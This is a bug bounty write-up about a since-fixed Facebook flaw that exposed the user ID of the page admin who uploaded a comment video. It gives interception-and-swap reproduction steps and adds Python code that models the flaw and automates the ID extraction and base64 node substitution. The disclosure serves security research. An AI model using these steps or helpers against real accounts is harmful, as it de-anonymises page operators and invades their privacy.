Reveal the page admin who uploaded a video in a page's comment section

This post is about a bug I found on Facebook that disclosed the User ID of the page-role account (admin, editor, etc.) who posted a video in the comment section of a page post.

Recently I read a page-admin disclosure write-up by Kassem Bazzoun at https://bugreader.com/kbazzoun@221 . That bug revealed the page admin who uploaded a video to the page feed. After reading the write-up, I decided to check whether the fix could be bypassed with different scenarios.

The question that came to my mind was how the Facebook server validates the video ID when the video lives in a different section of the page.

Examples:

  1. Video in Page Cover Pic
  2. Video in Page Conversation
  3. Video in Comment Section on page feeds

The third case disclosed the page admin's User ID in the response, using the same reproduction steps as in Kassem Bazzoun's write-up.
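To make the validation question concrete, here is an added toy model in Python of what the "Info" endpoint would have to check. It is not Facebook's code and the names, IDs and data are constructed for illustration: `info_vulnerable` behaves the way the write-up describes (any visible node returns its uploader), while `info_hardened` adds the two checks whose absence the bug exploits, namely that the node really is an attachment of the thread the button was pressed in, and that a page-role upload is attributed to the page rather than to the person behind it.

```python
from dataclasses import dataclass
from typing import Dict, FrozenSet, Optional


@dataclass(frozen=True)
class MediaObject:
    """One uploaded photo or video as the info endpoint might see it (toy model)."""
    object_id: str
    kind: str                   # "photo" or "video"
    section: str                # where it lives: "thread", "feed", "comment"
    owner_id: str               # profile or page the object belongs to
    uploader_user_id: str       # human account that performed the upload
    posted_as_page: bool        # uploaded while acting in a page role
    visible_to: FrozenSet[str]  # viewers allowed to see the object at all


# Constructed data (made-up IDs): a photo the attacker legitimately received in a
# Messenger thread, and a video posted as the page in a comment, which the attacker
# can view like anyone else but which is not part of any conversation.
ATTACKER = "u_attacker"
PAGE_ADMIN = "u_admin"
PAGE = "page_1"

OBJECTS: Dict[str, MediaObject] = {
    "30001": MediaObject("30001", "photo", "thread", ATTACKER, "u_friend", False,
                         frozenset({ATTACKER, "u_friend"})),
    "40002": MediaObject("40002", "video", "comment", PAGE, PAGE_ADMIN, True,
                         frozenset({ATTACKER, PAGE_ADMIN, "u_anyone"})),
}


def info_vulnerable(node_id: str, viewer_id: str) -> Optional[dict]:
    """Pre-fix behaviour as the write-up describes it: the endpoint only checks that
    the viewer may see the node, not that the node is a thread attachment, so a
    comment video reached by ID leaks the uploading admin's user ID."""
    obj = OBJECTS.get(node_id)
    if obj is None or viewer_id not in obj.visible_to:
        return None
    return {"id": obj.object_id, "creator": obj.uploader_user_id}


def info_hardened(node_id: str, viewer_id: str,
                  thread_attachments: FrozenSet[str]) -> Optional[dict]:
    """Illustrative checks missing above (not Facebook's actual fix): the node must be
    an attachment of the thread the Info button was pressed in, and a page-role
    upload is attributed to the page, never to the person acting as the page."""
    obj = OBJECTS.get(node_id)
    if obj is None or viewer_id not in obj.visible_to:
        return None
    if node_id not in thread_attachments:
        return None  # node swapped in from another section: refuse
    creator = obj.owner_id if obj.posted_as_page else obj.uploader_user_id
    return {"id": obj.object_id, "creator": creator}


if __name__ == "__main__":
    thread = frozenset({"30001"})
    print("vulnerable, comment video:", info_vulnerable("40002", ATTACKER))
    print("hardened,   comment video:", info_hardened("40002", ATTACKER, thread))
    print("hardened,   thread photo: ", info_hardened("30001", ATTACKER, thread))
```

The point of the model is that visibility of the object is not the same as authorization for the context the endpoint serves; the vulnerable version conflates the two, which is exactly what lets a video ID from the comment section be dropped into a Messenger request.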

Reproduction Steps:

  1. Find a video that was uploaded in the comments section of a page post while acting as the page.

  2. Get the video ID of that comment video through the Facebook Graph API.

Endpoint: https://graph.facebook.com/v5.0/PAGEID_POSTID?fields=comments{attachment}&access_token=XXXX

  3. With the video ID in hand, open https://messenger.com, click any image that was sent in a conversation, and then click the "Info" button. Make sure Burp Suite's intercept is on before clicking Info.

  4. Intercept the request and replace the base64 node value (xxxxxxx) with the video ID from the comment section.

  5. After forwarding the request, the response discloses the creator User ID of the page-role account that uploaded the video.
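The two mechanical parts of the procedure above, pulling video IDs out of the Graph API response and rewriting the base64 node value in the intercepted Info request, as an added Python example (not the author's code). The JSON is a constructed sample in the shape of a Graph API `comments{attachment}` response with made-up IDs. The internal layout of the node value is an assumption: the page only says it is base64, so the helper decodes it, substitutes the ID it expects to find, and returns None when that ID is not present so the value can be inspected by hand instead.

```python
import base64
import json
from typing import List, Optional

# Constructed sample of what GET /v5.0/PAGEID_POSTID?fields=comments{attachment}
# returns. Field names follow the public Graph API attachment shape; IDs are made up.
SAMPLE_RESPONSE = json.dumps({
    "comments": {
        "data": [
            {"id": "1000_2001", "attachment": {
                "type": "photo",
                "target": {"id": "30001", "url": "https://www.facebook.com/photo.php?fbid=30001"}}},
            {"id": "1000_2002", "attachment": {
                "type": "video_inline",
                "target": {"id": "40002", "url": "https://www.facebook.com/1000/videos/40002/"}}},
            {"id": "1000_2003"},  # plain text comment, no attachment
        ]
    },
    "id": "1000_5000",
})


def extract_video_ids(graph_response_json: str) -> List[str]:
    """Step 2: return the target ID of every video attached to a comment."""
    doc = json.loads(graph_response_json)
    ids = []
    for comment in doc.get("comments", {}).get("data", []):
        attachment = comment.get("attachment")
        if not attachment:
            continue  # text-only comment
        if attachment.get("type", "").startswith("video"):
            target_id = attachment.get("target", {}).get("id")
            if target_id:
                ids.append(target_id)
    return ids


def swap_node_id(node_b64: str, old_id: str, new_id: str) -> Optional[str]:
    """Step 4: decode the intercepted base64 node value, replace the photo's ID with
    the video's ID, and re-encode. ASSUMPTION: the decoded bytes contain the numeric
    object ID as ASCII; the page does not document the layout, so give up (None)
    when the expected ID is not there rather than guess."""
    raw = base64.b64decode(node_b64)
    if old_id.encode() not in raw:
        return None
    return base64.b64encode(raw.replace(old_id.encode(), new_id.encode())).decode()


def demo() -> dict:
    """Run both steps on the constructed sample. The 'captured' token stands in for
    the real intercepted node value and is constructed here, not taken from Facebook."""
    photo_id = "30001"
    video_ids = extract_video_ids(SAMPLE_RESPONSE)
    captured = base64.b64encode(b"node:" + photo_id.encode()).decode()
    swapped = swap_node_id(captured, photo_id, video_ids[0])
    return {
        "video_ids": video_ids,
        "captured": captured,
        "swapped": swapped,
        "swapped_decoded": base64.b64decode(swapped).decode(),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

In practice you would feed `extract_video_ids` the body returned by the endpoint in step 2 and `swap_node_id` the node value Burp shows you in step 4; if `swap_node_id` returns None, the decoded bytes do not carry the ID the way this example assumes and the value needs to be inspected before editing.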

Timeline:

22-Sep-2020: Report Sent

22-Sep-2020: Further investigation by Facebook

08-Oct-2020: Fixed confirmed by Facebook and me

10-Oct-2020: $4500 bounty + $338 bonus awarded by Facebook


This bug was reported as a BountyCon 2020 event submission. Thank you to the Facebook team for quickly addressing and fixing this issue.

Apart from this bug, I also found two more bugs during the event submission:

  1. Delete any photo on Facebook.
  2. Stealing a CSRF token using a clickjacking attack.

I will publish the write-ups for these soon.

Written by

Web Security Researcher
